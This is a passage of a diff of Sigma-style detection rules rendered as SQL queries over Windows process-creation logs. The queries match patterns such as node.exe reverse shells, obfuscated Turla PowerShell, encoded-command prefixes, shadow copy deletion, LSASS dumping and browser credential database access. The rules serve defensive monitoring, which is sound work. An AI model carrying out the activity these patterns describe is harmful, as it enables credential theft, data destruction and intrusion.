"Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1216.001" ], "falsepositives": [ - "Legitimate use by administrators" + "Legitimate usage of the script by a developer" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NirCmd.exe' ESCAPE '\\' OR OriginalFileName = 'NirCmd.exe' OR (CommandLine LIKE '% execmd %' ESCAPE '\\' OR CommandLine LIKE '%.exe script %' ESCAPE '\\' OR CommandLine LIKE '%.exe shexec %' ESCAPE '\\' OR CommandLine LIKE '% runinteractive %' ESCAPE '\\')) OR ((CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% exec2 %' ESCAPE '\\') AND (CommandLine LIKE '% show %' ESCAPE '\\' OR CommandLine LIKE '% hide %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Launch-VsDevShell.ps1%' ESCAPE '\\' AND (CommandLine LIKE '%VsWherePath %' ESCAPE '\\' OR CommandLine LIKE '%VsInstallationPath %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nircmd.yml" + "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml" }, { - "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", - "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "title": "Winrar Execution in Non-Standard Folder", + "id": "4ede543c-e098-43d9-a28f-dd784a13132f", "status": "test", - "description": "Detects new commands that add new printer port which point to suspicious file", - "author": "EagleEye Team, Florian Roth", + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "author": "Florian Roth (Nextron Systems), Tigzy", "tags": [ - "attack.persistence", - "attack.execution", - "attack.t1059.001" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "New printer port install on host" + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((NewProcessName LIKE '%\\\\WinRAR%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2020_1048.yml" + "filename": "proc_creation_win_winrar_execution.yml" }, { - "title": "Potential Credential Dumping Via LSASS Process Clone", - "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", + "title": "Execute Code with Pester.bat", + "id": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", "status": "test", - "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Unknown" + "Legitimate use of Pester for writing tests for Powershell scripts and modules" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Pester%' ESCAPE '\\' AND CommandLine LIKE '%Get-Help%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%pester%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\' AND (CommandLine LIKE '%help%' ESCAPE '\\' OR CommandLine LIKE '%_%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_lsass_clone.yml" + "filename": "proc_creation_win_lolbin_pester_1.yml" }, { - "title": "Suspicious Msbuild Execution By Uncommon Parent Process", - "id": "33be4333-2c6b-44f4-ae28-102cdbde0a31", + "title": "HackTool - Wmiexec Default Powershell Command", + "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", "status": "experimental", - "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", - "author": "frack113", + "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.lateral_movement" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSBuild.exe' ESCAPE '\\' OR OriginalFileName = 'MSBuild.exe') AND NOT ((ParentProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\python.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nuget.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msbuild_susp_parent_process.yml" + "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" }, { - "title": "Remote Access Tool - AnyDesk Execution", - "id": "b52e84a3-029e-4529-b09b-71d19dd27e94", + "title": "Arbitrary Command Execution Using WSL", + "id": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary linux and windows commands", + "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Legitimate use" + "Automation and orchestration scripts may use this method to execute scripts etc.", + "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR OriginalFileName = 'wsl.exe') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --exec%' ESCAPE '\\' OR CommandLine LIKE '% --system%' ESCAPE '\\' OR CommandLine LIKE '% --shell-type %' ESCAPE '\\' OR CommandLine LIKE '% /mnt/c%' ESCAPE '\\' OR CommandLine LIKE '% --user root%' ESCAPE '\\' OR CommandLine LIKE '% -u root%' ESCAPE '\\' OR CommandLine LIKE '%--debug-shell%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -e kill %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk.yml" + "filename": "proc_creation_win_wsl_lolbin_execution.yml" }, { - "title": "Execution in Outlook Temp Folder", - "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", - "status": "test", - "description": "Detects a suspicious program execution in Outlook temp folder", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Firewall Configuration Discovery Via Netsh.EXE", + "id": "0e4164da-94bc-450d-a7be-a4b176179f1f", + "status": "experimental", + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.discovery", + "attack.t1016" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%netsh %' ESCAPE '\\' AND CommandLine LIKE '%show %' ESCAPE '\\' AND CommandLine LIKE '%firewall %' ESCAPE '\\' AND (CommandLine LIKE '%config %' ESCAPE '\\' OR CommandLine LIKE '%state %' ESCAPE '\\' OR CommandLine LIKE '%rule %' ESCAPE '\\' OR CommandLine LIKE '%name=all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" + "filename": "proc_creation_win_netsh_fw_rules_discovery.yml" }, { - "title": "Turla Group Commands May 2020", - "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", - "status": "test", - "description": "Detects commands used by Turla group as reported by ESET in May 2020", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Script Execution From Temp Folder", + "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "status": "experimental", + "description": "Detects a suspicious script executions from temporary folder", + "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", "tags": [ - "attack.g0010", "attack.execution", - "attack.t1059.001", - "attack.t1053.005", - "attack.t1027" - ], - "falsepositives": [ - "Unknown" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_apt_turla_comrat_may20.yml" - }, - { - "title": "Format.com FileSystem LOLBIN", - "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", - "status": "test", - "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_format.yml" + "filename": "proc_creation_win_susp_script_exec_from_temp.yml" }, { - "title": "Suspicious PowerShell Encoded Command Patterns", - "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + "title": "Potential Arbitrary Code Execution Via Node.EXE", + "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", "status": "experimental", - "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Other tools that work with encoded scripts in the command line instead of script files" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" + "filename": "proc_creation_win_node_abuse.yml" }, { - "title": "Rundll32 Execution Without Parameters", - "id": "5bb68627-3198-40ca-b458-49f973db8752", - "status": "test", - "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", - "author": "Bartlomiej Czyz, Relativity", + "title": "Suspicious Execution of Systeminfo", + "id": "0ef56343-059e-4cb6-adc1-4c3c967c5e46", + "status": "experimental", + "description": "Detects usage of the \"systeminfo\" command to retrieve information", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" + "attack.discovery", + "attack.t1082" ], "falsepositives": [ - "False positives may occur if a user called rundll32 from CLI with no options" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine IN ('rundll32.exe', 'rundll32'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR OriginalFileName = 'sysinfo.exe'))" ], - "filename": "proc_creation_win_rundll32_without_parameters.yml" + "filename": "proc_creation_win_systeminfo_execution.yml" }, { - "title": "Phishing Pattern ISO in Archive", - "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "title": "SQLite Chromium Profile Data DB Access", + "id": "24c77512-782b-448a-8950-eddb0785fc71", "status": "experimental", - "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", + "author": "TropChaud", "tags": [ - "attack.initial_access", - "attack.t1566" + "attack.credential_access", + "attack.t1539", + "attack.t1555.003", + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" + "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" }, { - "title": "Service StartupType Change Via PowerShell Set-Service", - "id": "62b20d44-1546-4e61-afce-8e175eb9473c", + "title": "PDQ Deploy Remote Adminstartion Tool Execution", + "id": "d679950c-abb7-43a6-80fb-2a480c4fc450", "status": "experimental", - "description": "Detects the use of the PowerShell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\" or \"manual\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of PDQ Deploy remote admin tool", + "author": "frack113", "tags": [ "attack.execution", - "attack.defense_evasion", - "attack.t1562.001" + "attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ - "False positives may occur with troubleshooting scripts" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR OriginalFileName = 'PowerShell.EXE') AND (CommandLine LIKE '%Set-Service%' ESCAPE '\\' AND CommandLine LIKE '%-StartupType%' ESCAPE '\\' AND (CommandLine LIKE '%Disabled%' ESCAPE '\\' OR CommandLine LIKE '%Manual%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PDQ Deploy Console' OR Product = 'PDQ Deploy' OR Company = 'PDQ.com' OR OriginalFileName = 'PDQDeployConsole.exe'))" ], - "filename": "proc_creation_win_powershell_set_service_disabled.yml" + "filename": "proc_creation_win_pdqdeploy_execution.yml" }, { - "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", - "id": "75578840-9526-4b2a-9462-af469a45e767", - "status": "test", - "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Whoami.EXE Execution From Privileged Process", + "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", "tags": [ - "attack.persistence", - "attack.t1136.001", - "cve.2021.35211" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'whoami.exe' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" + "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" }, { - "title": "HackTool - Hashcat Password Cracker Execution", - "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", + "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", "status": "test", - "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", - "author": "frack113", + "description": "Detects new commands that add new printer port which point to suspicious file", + "author": "EagleEye Team, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1110.002" + "attack.persistence", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Tools that use similar command line flags and values" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_hashcat.yml" + "filename": "proc_creation_win_exploit_cve_2020_1048.yml" }, { - "title": "Suspicious Userinit Child Process", - "id": "b655a06a-31c0-477a-95c2-3726b83d649d", + "title": "Curl.EXE Execution With Custom UserAgent", + "id": "3286d37a-00fd-41c2-a624-a672dcd34e60", "status": "test", - "description": "Detects a suspicious child process of userinit", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden (idea)", + "description": "Detects execution of curl.exe with custom useragent options", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1055" + "attack.command_and_control", + "attack.t1071.001" ], "falsepositives": [ - "Administrative scripts" + "Scripts created by developers and admins", + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%\\\\netlogon\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR OriginalFileName = 'explorer.exe')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -A %' ESCAPE '\\' OR CommandLine LIKE '% --user-agent %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_userinit_child.yml" + "filename": "proc_creation_win_curl_useragent.yml" }, { - "title": "Suspicious Execution of Shutdown", - "id": "34ebb878-1b15-4895-b352-ca2eeb99b274", + "title": "Potential Maze Ransomware Activity", + "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", "status": "test", - "description": "Use of the commandline to shutdown or reboot windows", - "author": "frack113", + "description": "Detects specific process characteristics of Maze ransomware word document droppers", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.t1047", "attack.impact", - "attack.t1529" + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND (CommandLine LIKE '%/r %' ESCAPE '\\' OR CommandLine LIKE '%/s %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND NewProcessName LIKE '%.tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_shutdown_execution.yml" + "filename": "proc_creation_win_malware_maze_ransomware.yml" }, { - "title": "LSA PPL Protection Disabled Via Reg.EXE", - "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "title": "Process Memory Dump Via Dotnet-Dump", + "id": "53d8d3e1-ca33-4012-adf3-e05a4d652e34", "status": "experimental", - "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of \"dotnet-dump\" with the \"collect\" flag. The execution could indicate potential process dumping of critical processes such as LSASS", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.010" + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dotnet-dump.exe' ESCAPE '\\' OR OriginalFileName = 'dotnet-dump.dll') AND CommandLine LIKE '%collect%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" + "filename": "proc_creation_win_lolbin_dotnet_dump.yml" }, { - "title": "Psexec Execution", - "id": "730fc21b-eaff-474b-ad23-90fd265d4988", - "status": "test", - "description": "Detects user accept agreement execution in psexec commandline", - "author": "omkar72", + "title": "Use of Mftrace.exe", + "id": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", + "status": "experimental", + "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", + "author": "Nasreddine Bencherchali 